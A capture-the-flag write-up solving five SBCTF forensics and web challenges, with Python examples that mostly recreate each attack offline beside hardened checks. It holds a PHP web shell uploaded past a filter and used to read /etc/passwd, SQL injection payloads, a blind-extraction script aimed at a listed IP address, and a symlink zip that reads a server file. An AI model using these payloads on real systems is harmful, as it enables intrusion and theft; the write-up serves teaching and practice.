Misplaced

Forensics – 50pts

Description

What is this file?!

Solution

Here we get a file called file.what. Running file file.what only reports data, so let's see what binwalk can find.

 DECIMAL       HEXADECIMAL     DESCRIPTION
 1048576       0x100000        Zip archive data, encrypted at least v2.0 to extract, compressed size: 282364, uncompressed size: 287052, name: Article1.jpg
 1331114       0x144FAA        End of Zip archive, footer length: 64, comment: "Password: 3a24869a641d60c09ceb71af4f99cffc"

Looks like we got a password-protected zip file, and the password itself sits in the archive comment. Extracting the zip (binwalk -e, or carving it from offset 0x100000 by hand) and unzipping it with that password gives us the file Article1.jpg, but it can't be viewed as an image.

Running file on Article1.jpg shows that it is actually an MS Word document. Opening it in a Word viewer gives a document that contains the flag.

SBCTF{n1c3_c4rv1n6_w3ll_d0n3}
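The carving step above, done by hand. This is an added example, not part of the original write-up or the challenge files: the blob is constructed in memory (1 MiB of padding followed by a small, unencrypted zip with a password in its archive comment) to stand in for file.what, and the file name, offset and comment text are sample values.

```python
#!/usr/bin/env python3
"""Carve an embedded zip out of an opaque blob and read its archive comment.
Added example, not the challenge's own files: the blob below is constructed
in memory (padding followed by a small unencrypted zip) to stand in for file.what."""
import io
import struct
import zipfile

LOCAL_FILE_HEADER = b"PK\x03\x04"   # first bytes of a zip's first entry
EOCD_SIGNATURE = b"PK\x05\x06"      # end-of-central-directory record
EOCD_FIXED_LEN = 22                 # fixed part of EOCD; comment length sits at offset 20


def build_sample_blob():
    """Constructed stand-in for file.what: 1 MiB of zeros, then a zip whose
    archive comment carries a password, then a little trailing junk."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # fake OLE header plus filler, standing in for the Word document
        zf.writestr("Article1.jpg", b"\xd0\xcf\x11\xe0" + b"A" * 500)
        zf.comment = b"Password: 3a24869a641d60c09ceb71af4f99cffc"
    return b"\x00" * 0x100000 + buf.getvalue() + b"\xff" * 16


def carve_zips(blob):
    """Return a list of (offset, zip_bytes), one per local-file-header ... EOCD span.

    The EOCD record is located by signature; its own comment-length field then
    says where the archive really ends, so the trailing comment is kept.
    Like binwalk, this can be fooled by a stray 'PK\\x05\\x06' inside compressed
    data, which is why inspect_zip() re-parses the result as a sanity check."""
    found = []
    pos = 0
    while True:
        start = blob.find(LOCAL_FILE_HEADER, pos)
        if start < 0:
            break
        eocd = blob.find(EOCD_SIGNATURE, start)
        if eocd < 0:
            break
        (comment_len,) = struct.unpack_from("<H", blob, eocd + 20)
        end = eocd + EOCD_FIXED_LEN + comment_len
        found.append((start, blob[start:end]))
        pos = end
    return found


def inspect_zip(data):
    """Return (archive comment, member names, any-member-encrypted) for carved bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        encrypted = any(info.flag_bits & 0x1 for info in zf.infolist())
        return zf.comment.decode(errors="replace"), zf.namelist(), encrypted


def recover_password(comment):
    """Pull the value after 'Password: ' out of the archive comment, if present."""
    prefix = "Password: "
    return comment[len(prefix):] if comment.startswith(prefix) else None


if __name__ == "__main__":
    blob = build_sample_blob()
    for offset, data in carve_zips(blob):
        comment, names, encrypted = inspect_zip(data)
        print(f"zip at 0x{offset:X}: members={names} encrypted={encrypted}")
        print("password:", recover_password(comment))
```

Python's zipfile cannot write encrypted archives, so the sample is unencrypted; on the real file the encrypted flag would be set and the password from the comment would be needed to extract Article1.jpg.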

Nice Duck!

Forensics – 100pts

Description

Do you want to see a nice duck?

Solution

For this challenge we get a pcap. Opening the capture in Wireshark shows some HTTP traffic, and the File -> Export Objects -> HTTP window lists the objects transferred over it, among them movie.mp4.

Saving movie.mp4 and watching it shows the flag after a couple of seconds.

SBCTF{1n53cur3_commun1c471on}

Flag Script

Web – 50pts

Description

This website looks familiar, but does it even flag?

Solution

Taking a look at the challenge page we get a matrix-like animation.

Looking at the page source we can see that a script called flagscript.js is loaded.


Opening the script shows obfuscated code. After cleaning it up a bit we find the following.

var fontSize = 0xa,
  columns = canvasObject[getArrValue(0x172)] / fontSize,
  drops = [],
  a = "S",
  xx = "_",
  ab = "}",
  c = "C",
  d = "T",
  e = "F",
  f = "{",
  g = "n",
  r = "c",
  bg = "0",
  fv = "B",
  i = "t",
  j = "_",
  k = "a",
  m = "n",
  n = "i",
  o = "c",
  u = "e",
  jj = "e",
  q = "_",
  s = "o",
  kk = "d",
  flag = a[getArrValue(0x16f)](
    fv, c, d, e, f, g, bg, i, j, k, xx, m, n, o, jj, q, r, s, kk, u, ab
  );

The flag is assembled at runtime by a[getArrValue(0x16f)](...), where getArrValue maps the index 0x16f back to a method name on the string "S" (the string-array lookup is what hides the call; given the result it has to be concat). Reading the single-character variables off in the order they are passed already spells the flag, and so does simply typing flag in the browser console, since var puts it in the global scope.

SBCTF{n0t_a_nice_code}

Trojan Horse

Web – 100pts

Description

There is an Art Gallery that is taking submissions online due to the pandemic, we need you to find the password of the administrator account. btw, I heard that their security system has a flaw in it and stores passwords in plaintext.

Solution

When entering the challenge page we get an upload form.

Trying to upload different files reveals that only image types are accepted; uploading a PHP file gives an error message.

By keeping a .png extension in the filename and declaring the content type as image/png we can get a PHP shell past the check, while the stored file keeps its real .php suffix.

Content-Disposition: form-data; name="image"; filename="php-backdoor.png.php"
Content-Type: image/png

When we send the altered request we get the following response.

<pre>Your Artwork was uploaded! at <a href='uploads/88c18fcbf6231d7c4d4940bea6d11c85.php'>uploads/88c18fcbf6231d7c4d4940bea6d11c85.php</a></pre>

Now we can use the shell to poke around. In /etc/passwd the administrator's password field holds the flag, on the last line.

administrator:SBCTF{unr3s7r1c73d_f1l3_upl04d_1s_d4ng3r0us}:1000:1000:administrator,,,:/home/administrator:/bin/bash
SBCTF{unr3s7r1c73d_f1l3_upl04d_1s_d4ng3r0us}
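Why the gallery's check fails, and what a sound one looks like. This is an added example, not the challenge's server code: naive_check() is an assumed reconstruction of a filter that accepts exactly the altered request above (an image/png Content-Type and ".png" somewhere in the filename), the magic-byte table and stored_name() are the hardened counterpart, and the multipart body and the PHP shell bytes are constructed for illustration.

```python
#!/usr/bin/env python3
"""Upload filter bypass (as used against the gallery) beside a hardened check.
Added example, not the challenge's server code; naive_check() is an assumed
reconstruction of the vulnerable filter, the request bytes are constructed."""
import re
import secrets

# extension allowlist and the magic bytes each one must start with
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}
EXT_ALIASES = {"jpeg": "jpg"}


def multipart_body(field, filename, content_type, data, boundary="----sbctfboundary"):
    """Build the multipart/form-data body the attacker controls end to end:
    the filename and Content-Type headers are client-supplied claims, not facts."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n").encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def naive_check(filename, content_type):
    """Assumed vulnerable filter: trusts the declared MIME type and is happy
    with an image extension anywhere in the name, so 'x.png.php' passes and
    the file is stored with its real, executable .php suffix."""
    return content_type.startswith("image/") and \
        re.search(r"\.(png|jpe?g|gif)", filename, re.I) is not None


def hardened_check(filename, content_type, data):
    """Allowlist the *last* extension, verify the magic bytes and require the
    two to agree. The client's Content-Type is deliberately ignored."""
    if "." not in filename:
        return False
    ext = filename.rsplit(".", 1)[1].lower()
    ext = EXT_ALIASES.get(ext, ext)
    magic = ALLOWED.get(ext)
    if magic is None:
        return False
    return data.startswith(magic)


def stored_name(ext):
    """Server-chosen name: random, with the extension taken from the validated
    type and never from the upload (the gallery randomised the name but kept .php)."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    shell = b"<?php system($_GET['cmd']); ?>"   # constructed stand-in for php-backdoor
    body = multipart_body("image", "php-backdoor.png.php", "image/png", shell)
    print(body.decode())
    print("naive accepts bypass:", naive_check("php-backdoor.png.php", "image/png"))
    print("hardened accepts bypass:", hardened_check("php-backdoor.png.php", "image/png", shell))
    print("stored as:", stored_name("png"))
```

Even with the hardened check, the upload directory should be served without script execution (no PHP handler for uploads/), so that a validated image that also happens to be valid PHP still cannot run.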

Blind Flagger

Web – 200pts

Description

Everything is under the table, the flag table!

Solution

Here we have an administrator login page.

Neither of the two parameters seems to be vulnerable to SQL injection; we only get the message you FAlid to 3nt3r. Looking at the source, we find a comment.

<!--"/old-login" if this didn't work -->

Sending a POST request to /old-login with uname=Admin&psw=' OR 1=1;-- returns You did it!!, while uname=Admin&psw=' OR 1=2;-- returns the you FAlid to 3nt3r message. That gives us a boolean oracle: any SQL condition can be evaluated one yes/no answer at a time.

Now we need to find out which SQL server is in use. last_insert_rowid() exists only in SQLite (on other engines the query errors out, which shows up as the false branch), so when uname=Admin&psw=' OR last_insert_rowid()=last_insert_rowid();-- returns You did it!! we know we are dealing with an SQLite database and can enumerate the tables through sqlite_master.

Using uname=Admin&psw=' OR (SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name like '%') > 0;-- as the base and narrowing the LIKE pattern one character at a time, we find the table flag. The comparison works because SQLite orders any TEXT value above any INTEGER, so the subquery > 0 is true whenever some table matches the pattern and NULL (false) when none does.

Next we need the column names of the table flag. The CREATE statement is stored in sqlite_master.sql, so the same trick with uname=Admin&psw=' OR (SELECT sql FROM sqlite_master WHERE type='table' and sql like 'CREATE TABLE flag (%') > 0;-- as the base reveals a single column, flaggedflag.

To dump the data in the table we can use the following Python script, which recovers flaggedflag one character at a time from the same oracle.

#!/usr/bin/env python3
# Boolean-based blind extraction of flag.flaggedflag, one character at a time.

import requests
import string

URL = 'http://18.194.166.81:3334/old-login'
data = ''
idx = 1

while True:
    for char in string.printable:
        # Compare hex() of the idx-th character with a hex literal, so quotes and
        # other special characters among the candidates never break the query.
        payload = ("' OR (SELECT hex(substr(flaggedflag," + str(idx) + ",1)) FROM flag limit 1 offset 0) = '"
                   + char.encode().hex().upper() + "';--")
        r = requests.post(URL, {'uname': 'Admin', 'psw': payload})
        if "You did it!!" in r.text:
            data += char
            print(data)
            break
    else:
        # No candidate matched: we have run past the end of the string.
        break
    idx += 1

print('flag:', data)

Running this we get the flag.

SBCTF{Y0u-h@v3-G0t-th3-Fl@g}
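The whole chain (bypass, SQLite fingerprint, table and column discovery, and the character-by-character dump) can be rehearsed offline against a local stand-in before touching a target. This is an added example, not the challenge's code: an in-memory SQLite database plays the vulnerable backend, and the login table (users with uname/psw), the flag table layout (flag/flaggedflag) and the flag value are constructed assumptions used only to exercise the technique.

```python
#!/usr/bin/env python3
"""Offline re-creation of the Blind Flagger oracle. Added example, not the
challenge's code: an in-memory SQLite database stands in for the target, and
the users/flag tables and the flag value are constructed assumptions."""
import sqlite3
import string

SAMPLE_FLAG = "SBCTF{Y0u-h@v3-G0t-th3-Fl@g}"   # constructed sample value

db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE users (uname TEXT, psw TEXT);
INSERT INTO users VALUES ('Admin', 'not-the-real-password');
CREATE TABLE flag (flaggedflag TEXT);
""")
db.execute("INSERT INTO flag VALUES (?)", (SAMPLE_FLAG,))
db.commit()


def old_login(uname, psw):
    """The vulnerable endpoint: user input is concatenated into the query and
    the caller only learns whether any row came back (a boolean oracle)."""
    query = f"SELECT count(*) FROM users WHERE uname='{uname}' AND psw='{psw}'"
    return db.execute(query).fetchone()[0] > 0


def ask(condition):
    """Turn an arbitrary SQL condition into one yes/no question. '--' comments
    out the closing quote; no ';' is needed, so a single-statement executor is fine."""
    return old_login("Admin", f"' OR ({condition}) -- ")


def table_exists(pattern):
    """The write-up's existence probe: SQLite orders any TEXT above any INTEGER,
    so '(SELECT ...) > 0' is true when a table matches the LIKE pattern and
    NULL (false) when none does. Note that LIKE is ASCII case-insensitive."""
    return ask("(SELECT tbl_name FROM sqlite_master WHERE type='table' "
               f"AND tbl_name LIKE '{pattern}') > 0")


def extract(expression, from_clause, alphabet=string.printable):
    """Recover a string byte by byte by comparing hex(substr(...)) with a hex
    literal; the literal never needs quoting, so every candidate character is
    safe to test. Stops when no candidate matches, i.e. past the end."""
    out = ""
    while True:
        pos = len(out) + 1
        for ch in alphabet:
            literal = ch.encode().hex().upper()   # SQLite's hex() is upper-case
            if ask(f"(SELECT hex(substr({expression},{pos},1)) {from_clause}) = '{literal}'"):
                out += ch
                break
        else:
            return out


def table_definition(name):
    """Read a table's CREATE statement out of sqlite_master (column names live there)."""
    return extract("sql", f"FROM sqlite_master WHERE type='table' AND tbl_name='{name}'")


def dump_flag():
    """The final step: pull flaggedflag out of the flag table."""
    return extract("flaggedflag", "FROM flag LIMIT 1 OFFSET 0")


if __name__ == "__main__":
    print("bypass works:", ask("1=1"), "| false branch:", ask("1=2"))
    print("SQLite fingerprint:", ask("last_insert_rowid()=last_insert_rowid()"))
    print("table like 'fl%':", table_exists("fl%"), "| 'zz%':", table_exists("zz%"))
    print(table_definition("flag"))
    print(dump_flag())
```

Swapping ask() for a function that posts the condition to /old-login and checks the response for You did it!! turns this into the live version; everything above it stays the same. Reading the CREATE statement back is usually quicker than guessing column names, and it also reveals any extra columns the challenge text did not mention.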

Upgrade

Web – 200pts

Description

File Upload , sensitive data exposure using zip symlinks file

Solution

For this challenge we get an upload form, and as the description suggests we should upload a zip file containing a symlink.

There's also a robots.txt that gives us some extra hints about where the flag lives.

User-agent: *
Disallow: /uploads
Disallow: /home/flag

If we upload a zip file containing a symlink pointing to /home/flag we get an error telling us that the file failed to upload. As it turns out, the zip file has to be named upload.zip and the entry inside it has to be named source.

After creating the link with ln -s /home/flag source and packing it with zip --symlinks -r upload.zip source (without --symlinks, zip would follow the link and store the target's contents, or fail because /home/flag does not exist locally, rather than storing the link itself), uploading the archive gets us the flag.

FLAG{zIp_aNd_sYmLinkS_arE_S0_rIskY}
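What happens on the server side when the archive is unpacked, and the check that stops it. This is an added example, not the challenge's code: a temporary directory stands in for the server, a constructed file inside it plays the role of /home/flag, and naive_extract() reproduces the behaviour of an extractor that honours symlink entries (as unzip does by default).

```python
#!/usr/bin/env python3
"""Zip symlink smuggling: how a symlink entry leaks a file outside the upload
directory, and the extractor check that stops it. Added example, not the
challenge's code; a temporary directory stands in for the server and a
constructed file inside it plays the role of /home/flag."""
import os
import stat
import tempfile
import zipfile


def build_symlink_zip(zip_path, link_name, target):
    """Write a zip whose single entry is a symlink, as `zip --symlinks` does:
    the entry's data is the link target and the Unix mode in the external
    attributes carries S_IFLNK."""
    info = zipfile.ZipInfo(link_name)
    info.create_system = 3                               # 3 = Unix
    info.external_attr = (stat.S_IFLNK | 0o777) << 16    # mode lives in the high 16 bits
    with zipfile.ZipFile(zip_path, "w") as zf:
        zf.writestr(info, target)


def entry_is_symlink(info):
    """True when a ZipInfo's Unix mode marks it as a symbolic link."""
    return stat.S_ISLNK(info.external_attr >> 16)


def naive_extract(zip_path, dest):
    """Extractor that honours symlink entries. Whatever later serves
    uploads/<name> follows the link to its target, wherever that is."""
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            out = os.path.join(dest, info.filename)
            if entry_is_symlink(info):
                os.symlink(zf.read(info).decode(), out)
            else:
                with open(out, "wb") as fh:
                    fh.write(zf.read(info))


def safe_extract(zip_path, dest):
    """Hardened extractor: reject symlink entries and path traversal before
    writing anything, then extract the regular members only."""
    root = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            if entry_is_symlink(info):
                raise ValueError(f"refusing symlink entry {info.filename!r}")
            target = os.path.realpath(os.path.join(root, info.filename))
            if target != root and not target.startswith(root + os.sep):
                raise ValueError(f"refusing traversal entry {info.filename!r}")
        zf.extractall(root)


def demo():
    """Return (what the naive extractor leaks, whether the safe one refused the zip)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "flag")               # stands in for /home/flag
        with open(secret, "w") as fh:
            fh.write("FLAG{constructed_sample}")
        zip_path = os.path.join(tmp, "upload.zip")
        build_symlink_zip(zip_path, "source", secret)

        uploads = os.path.join(tmp, "uploads")
        os.mkdir(uploads)
        naive_extract(zip_path, uploads)
        with open(os.path.join(uploads, "source")) as fh:   # read follows the link
            leaked = fh.read()

        safe_dir = os.path.join(tmp, "safe")
        os.mkdir(safe_dir)
        try:
            safe_extract(zip_path, safe_dir)
            refused = False
        except ValueError:
            refused = True
        return leaked, refused


if __name__ == "__main__":
    leaked, refused = demo()
    print("naive extractor leaked:", leaked)
    print("safe extractor refused:", refused)
```

Python's own ZipFile.extractall() happens not to create symlinks (it writes the link target as a plain file), which is why the naive path is spelled out by hand; shelling out to unzip, or using a library that does honour the mode bits, gives the vulnerable behaviour for free.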